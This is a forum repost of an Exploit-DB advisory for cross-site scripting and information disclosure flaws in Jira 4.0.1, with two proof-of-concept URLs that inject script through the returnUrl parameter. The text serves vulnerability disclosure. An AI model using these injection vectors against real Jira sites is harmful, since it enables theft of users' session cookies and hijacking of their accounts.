Exploit Jira 4.0.1 - Cross-Site Scripting / Information Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
34384
Проверка EDB
  1. Пройдено
Автор
MAXE
Тип уязвимости
WEBAPPS
Платформа
JSP
CVE
N/A
Дата публикации
2010-07-28
Jira 4.0.1 - Cross-Site Scripting / Information Disclosure
Код:
source: https://www.securityfocus.com/bid/42025/info

Jira is prone to multiple cross-site scripting vulnerabilities and an information disclosure vulnerability because the application fails to sufficiently sanitize user-supplied input.

Attackers can exploit these issues to obtain sensitive information, steal cookie-based authentication information, and execute arbitrary client-side scripts in the context of the browser.

Jira 4.01 is vulnerable; other versions may also be affected. 

http://www.example.com/ViewIssue.jspa?id=[VALID_ID]&watch=true&returnUrl=data:text/html,<script>alert(0)</script>
http://www.example.com/AttachFile!default.jspa?id=[VALID_ID]&returnUrl=javascript:alert(0)';foo='
 
Источник
www.exploit-db.com

Похожие темы